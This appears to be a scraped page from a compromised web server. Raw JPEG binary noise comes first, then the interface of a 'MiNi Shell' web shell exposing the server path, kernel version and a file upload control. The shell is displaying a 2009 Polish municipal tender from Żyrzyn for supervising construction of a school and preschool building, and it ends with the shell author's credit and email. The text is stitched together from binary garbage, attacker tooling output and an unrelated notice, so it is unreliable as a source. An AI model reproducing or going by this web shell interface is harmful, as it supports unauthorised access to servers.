JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/136733-N-2009.html

<p class="kh_header"><b>Żyrzyn: Pełnienie funkcji inspektora nadzoru inwestorskiego dla robót budowlanych polegających na budowie infrastruktury edukacyjnej i sportowej w Żyrzynie.</b><br>
<b>Numer ogłoszenia: 136733 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Żyrzyn , ul. Powstania Styczniowego 10, 24-103 Żyrzyn, woj. lubelskie, tel. 081 8814226, 8814269, faks 081 8814226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego dla robót budowlanych polegających na budowie infrastruktury edukacyjnej i sportowej w Żyrzynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego dla robót budowlanych polegających na budowie budynku użyteczności publiczno- oświatowej mieszczącego w sobie dwie niezależne od siebie funkcje: gimnazjum i przedszkole.  Roboty budowlane będące przedmiotem nadzoru stanowią część projektu pn. Budowa infrastruktury edukacyjnej i sportowej w Żyrzynie. Nadzór inwestorski będzie pełniony w następujących branżach:
a)	konstrukcyjno - budowlanej,
b)	instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, gazowych
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
d)	drogowej
Wykonawca będzie obowiązany dysponować osobami, które posiadają uprawnienia do wykonywania samodzielnych funkcji w budownictwie zapewniających prowadzenie nadzoru inwestorskiego w zakresie w/w.

 Przedmiot robót budowlanych:
Planowany do budowy obiekt to budynek użyteczności publicznej- oświatowy mieszczący w sobie dwie niezależne od siebie funkcje: gimnazjum i przedszkole. Budynek połączony przestrzennie z istniejącym budynkiem szkoły podstawowej, o nowoczesnej architekturze nawiązujący do otaczającej go zabudowy swoją wysokością oraz zastosowanymi materiałami, składający się z dwu brył o zróżnicowanych wysokościach. 
Elewacje w układzie horyzontalnym podporządkowanym regularnemu podziałowi boniami. Budynek kryty stropodachem dwuspadowym o symetrycznym układzie połaci, z odprowadzeniem wody do koryt ukrytych za ściankami attykowymi. 
Budynek został konstrukcyjnie podzielony na trzy, oddylatowane od siebie segmenty. Segment A czterokondygnacyjny, częściowo podpiwniczony, segment B trzykondygnacyjny niepodpiwniczony i segment C dwukondygnacyjny, niepodpiwniczony. Budynek został funkcjonalnie podzielony na dwie niezależne od siebie funkcje: przedszkole zajmujące parter segmentu A i część parteru segmentu B oraz gimnazjum zajmujące część parteru segmentu A, segmentu B i segmentu C wraz z piętrami wszystkich segmentów. 
Przedszkole. 
Cztero oddziałowe przedszkole z dodatkowym oddziałem rezerwowym. Każda z sal dydaktycznych posiada własny węzeł sanitarny wyposażony w miski ustępowe, umywalki i natrysk. Sanitariaty są dostępne bezpośrednio z sal i są dodatkowo wyposażone w okna umożliwiające wychowawcy kontakt wzrokowy z dziećmi przebywającymi w sanitariatach. Wszystkie urządzenia zamontowane na wysokości ergonomicznej dla dzieci. Kabiny misek ustępowych wydzielone ściankami do wysokości 1,30m. Sale dydaktyczne wyposażone będą w stoliki, krzesełka i regały umożliwiające wszechstronne korzystanie z pomieszczenia. Jedna z sal posiada własny zamykany magazyn na leżaki. Przedszkole posiada wyjścia: pierwsze główne dostępne 5% pochylnią z terenu, zabezpieczone daszkiem poliwęglanowym i wiatrołapem, drugie prowadzące bezpośrednio do ogrodu przedszkolnego, zabezpieczone daszkiem poliwęglanowym i wiatrołapem, dodatkowo wyposażone w dwie toalety bez przedsionków służące dzieciom bawiącym się na zewnątrz. Żywienie w przedszkolu odbywać się będzie z własnej kuchni zlokalizowanej 
w podpiwniczeniu oraz w części pomieszczeń parteru. 
Gimnazjum. 
Dziewięcio oddziałowe gimnazjum przeznaczone dla około 300 uczniów i 25 nauczycieli. W oddziale będzie przebywać w zależności od potrzeb od 22 do 30 uczniów. Gimnazjum będzie funkcjonowało na trzech kondygnacjach połączonych ze sobą klatkami schodowymi oraz windą osobową umożliwiającą korzystanie z niej przez osoby niepełnosprawne, transport mebli oraz chorych na noszach. Gimnazjum zostało połączone z budynkiem istniejącej szkoły podstawowej, tak aby było możliwe korzystanie uczniów gimnazjum ze stołówki tej placówki, drzwiami w strefie parteru i pierwszego piętra. W strefie parteru - dodatkowo ustęp przystosowany do korzystania z niego przez osoby niepełnosprawne w tym poruszające się na wózkach inwalidzkich. W strefie parteru - wiatrołap oraz przestronny hol , z którego istnieje bezpośredni dostęp do dyżurki z pokojem socjalnym personelu gospodarczo technicznego, sanitariatów uczniów i personelu oraz szatni szafkowej uczniów. Sanitariaty uczniów z rozdziałem na chłopców i dziewczynki. Sanitariaty chłopców wyposażone w 2 kabiny z miskami ustępowymi, 2 pisuary oraz 
2 umywalki umieszczone w przedsionku. Sanitariaty dziewczynek wyposażone w 4 kabiny z miskami ustępowymi oraz 2 umywalki w przedsionku. 
Obydwie toalety posiadają doświetlenie światłem dziennym. Sanitariaty personelu 
z rozdziałem na mężczyzn i kobiet, wyposażone w 1 kabinę z miską ustępową oraz 
1 umywalką umieszczoną w przedsionku. W strefie parteru znajduje się dodatkowo ustęp przystosowany do korzystania z niego przez osoby niepełnosprawne w tym poruszające się na wózkach inwalidzkich. Szatnię uczniów wykonuje się jako szatnię szafkową z podwójnymi szafeczkami zamykanymi na zamki zgrupowanymi na wspólnych podstawach ławkowych. Boksy szatniowe wydzielono ściankami z płyt MDF do wysokości szafek. W strefie pierwszego piętra przewiduje się przestronny hol, z którego istnieje bezpośredni dostęp do sklepiku szkolnego, sanitariatów uczniów i personelu, zaplecza administracyjnego szkoły oraz pomieszczeń dydaktycznych. W strefie dydaktycznej - cztery sale lekcyjne z własnymi zapleczami, bibliotekę szkolną z pomieszczeniami księgozbioru, wypożyczalni i czytelni. W strefie 2 piętra - przestronny hol, z którego istnieje bezpośredni dostęp do pomieszczenia radiowęzła, sanitariatów uczniów i personelu oraz pomieszczeń dydaktycznych. W części dydaktycznej znajduje się siedem sal lekcyjnych z własnymi zapleczami oraz świetlica. Sala informatyki dodatkowo wyposażona w serwerownię. Do gimnazjum prowadzi 5 wejść. Pierwsze główne od strony wschodniej przez wiatrołap i pochylnię. Drugie ewakuacyjne od strony północno zachodniej, trzecie przeznaczone tylko dla personelu prowadzące do przedszkola i dwa prowadzące do przyległej szkoły podstawowej. Przewiduje się dwie pełnowymiarowe klatki schodowe, zapewniające dwukierunkowość ewakuacji. Budynek został zaprojektowany, jako zwarta bryła usytuowana w północno wschodniej części działki 340.2, w linii zabudowy wyznaczonej istniejącym budynkiem szkoły podstawowej. Rzut budynku oparto na kształcie litery L, przy czym jej wschodnie ramię zaprojektowano jako dwu, a północne jako trzykondygnacyjne, częściowo podpiwniczone. Budynek przylega do jednej ze ścian szczytowych istniejącej szkoły podstawowej. Do budynku prowadzą cztery niezależne wejścia mające bezpośredni wpływ na zagospodarowanie terenu. Wschodnie- stanowiące wejście do gimnazjum, dwa południowe- stanowiące wejście do przedszkola i północne stanowiące wejście do pomieszczeń kuchennych i będące jednocześnie wyjściem ewakuacyjnym z gimnazjum. Pomiędzy ramionami nowego budynku, przewiduje się plac zabaw przedszkolnych dla dzieci, ogrodzony, oświetlony i monitorowany. Ogród przedszkolny urządzony w znakomitej części jako powierzchnia biologicznie czynna z niewielką ilością terenów utwardzonych, wyposażony w urządzenia do zabaw i elementy małej architektury. W strefie wejścia do pomieszczeń technicznych i kuchennych przewiduje się utwardzony plac służący samochodom dostawczym i obsługowym. Na terenie działek należy wykonać przyłącza: kanalizacji sanitarnej- od istniejącej na działce 340.3 studni kanalizacyjnej do budynku; przyłącze i system wewnętrznej kanalizacji deszczowej odwadniający ciągi pieszo jezdne, parkingi i dachy do projektowanego kolektora deszczowego, zgodnie z warunkami technicznymi wydanymi przez Gminę Żyrzyn; przyłącze wodociągowe od przebudowywanego wodociągu Dn 110 do budynku, zgodnie z warunkami technicznymi wydanymi przez ZBiE WUK w Bełżycach. 
Przyłącza tj. przyłącze elektroenergetyczno- kablowe od budynku do nowoprojektowanej stacji transformatorowej zostanie wykonane przez Zakład Energetyczny w Puławach zgodnie z umową przyłączeniową; przyłącze gazowe- od budynku do istniejącego na działce 340.2 gazociągu g40 zostanie wykonane przez Zakład Gazowniczy w Lublinie zgodnie z umową przyłączeniową. Zakres przedmiotu zamówienia w tym zakresie obejmuje wykonanie energetycznego złącza kablowego w budynku w miejscu zaprojektowanym, a w zakresie instalacji gazowej wykonanie szafki gazowej na zewnątrz budynku zgodnie z projektem i warunkami technicznymi wydanymi przez zakład energetyczny i gazowniczy. Ścieki będą odprowadzane grawitacyjnie, a ze strefy podpiwniczonej- ciśnieniowo. Odprowadzenie ścieków nastąpi zgodnie z warunkami technicznymi wydanymi przez ZBiE WUK w Bełżycach. 
Przewiduje się przebudowę istniejącego wodociągu wA32 po istniejącej trasie od włączenia Dn 110 na działce 340/2 wraz z budową dwóch ujęć hydrantowych Dn 80 do gaszenia pożarów- zgodnie z warunkami technicznymi wydanymi przez ZBiEWUK w Bełżycach. Przewiduje się również system oświetlenia terenu, który będzie zasilany z nowo budowanego budynku. Przewiduje się wykonać windę bezreduktorową elektryczną w szybie żelbetowym, obsługującą wszystkie kondygnacje służącą komunikacji ogólnej, przystosowaną do przewozu mebli, chorych na noszach i osób niepełnosprawnych. Trasy dojść i dojazdów do budynku wykonane w sposób wolny od wszelkich barier architektonicznych. Budynek dostępny z zewnątrz systemem pochylni o normatywnych spadkach. Na terenie parkowania przewidziano jedno miejsce postojowe przeznaczone dla osoby niepełnosprawnej o wymiarach 230x600. Trasy dojść i dojazdów wewnątrz budynku do wszystkich pomieszczeń będą wolne od wszelkich barier architektonicznych. 
W przedszkolu i gimnazjum zaprojektowano toalety przeznaczone do korzystania z nich przez osoby niepełnosprawne w tym poruszające się na wózkach inwalidzkich. Budynek będzie wyposażony w następujące instalacje: wodociągową wody zimnej; wodociągową wody ciepłej z cyrkulacją z lokalnej kotłowni gazowej; hydrantów wewnętrznych; centralnego ogrzewania z lokalnej kotłowni gazowej; wentylacji mechanicznej nawiewno wywiewnej; wentylacji grawitacyjnej; instalację gazową zasilania kotłowni lokalnej i dygestorium w sali chemii; kanalizację sanitarną; kanalizację deszczową; oświetleniową i gniazd wtykowych; instalację elektryczną siłową; instalację odgromową; instalację telefoniczną; instalację dzwonkową; instalację alarmową; instalację komputerową; instalację zegarową; instalację oświetlenia awaryjnego i kierunkowego; instalację monitoringu wizyjnego; instalację nagłośnieniową; sterowania klapami dymowymi. Przedmiot zamówienia obejmuje również wyposażenie pomieszczeń budynku w meble i urządzenia zapewniające funkcjonowanie obiektu dydaktycznego, a także wyposażenie technologii kuchni i stołówki.
Szczegółowy zakres obowiązków inspektora nadzoru określony jest w projekcie umowy - załącznik nr 4 do SIWZ. Szczegółowy opis robót budowlanych podlegających nadzorowaniu określają dokumentacje projektowe oraz specyfikacje techniczne wykonania i odbioru robót, które Zamawiający udostępni zainteresowanym do wglądu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 17.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Udział w postepowaniu wymaga wniesienia wadium w wysokości 2 000,00 zł (słownie: dwa tysiące złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy Pzp, tj.: 
1)posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności; 
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.:
a)wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, minimum 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia. Za usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, zamawiający uzna wykonywanie funkcji Inspektora nadzoru, Inżyniera Kontraktu lub Inwestora Zastępczego dla budowy, rozbudowy lub przebudowy obiektów budowlanych kubaturowych i wartości inwestycji brutto minimum 4 mln zł każda, 
b)dysponują osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w budownictwie, które będą pełnić funkcje inspektorów nadzoru i posiadającymi minimum 5-letnie doświadczenie w zakresie kierowania lub nadzorowania robót budowlanych w specjalnościach:
- konstrukcyjno - budowlanej,
- instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, gazowych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
- drogowej.
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
a)posiadają polisę lub inny dokument ubezpieczenia potwierdzający, 
że Wykonawca posiada ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej. 
4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach 
i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenie, którego wzór stanowi Załącznik Nr 1 do niniejszej SIWZ.
2.W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych:
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia:
a)wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.  Dla każdej pozycji wykazu należy załączyć dokumenty (referencje, protokoły odbioru, umowy itp.) potwierdzające, że usługi te zostały wykonane należycie. Wzór wykazu stanowi załącznik nr 2 do SIWZ.
b)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
c)	Dokumenty potwierdzające posiadanie uprawnień do nadzorowania robót budowlanych dla każdego z inspektorów.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zyrzyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Żyrzyn ul. Powstania Styczniowego 10, 24 - 103 Żyrzyn pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 10:00, miejsce: Urzad Gminy Żyrzyn ul. Powstania Styczniowego 10, 24 - 103 Żyrzyn pokój nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com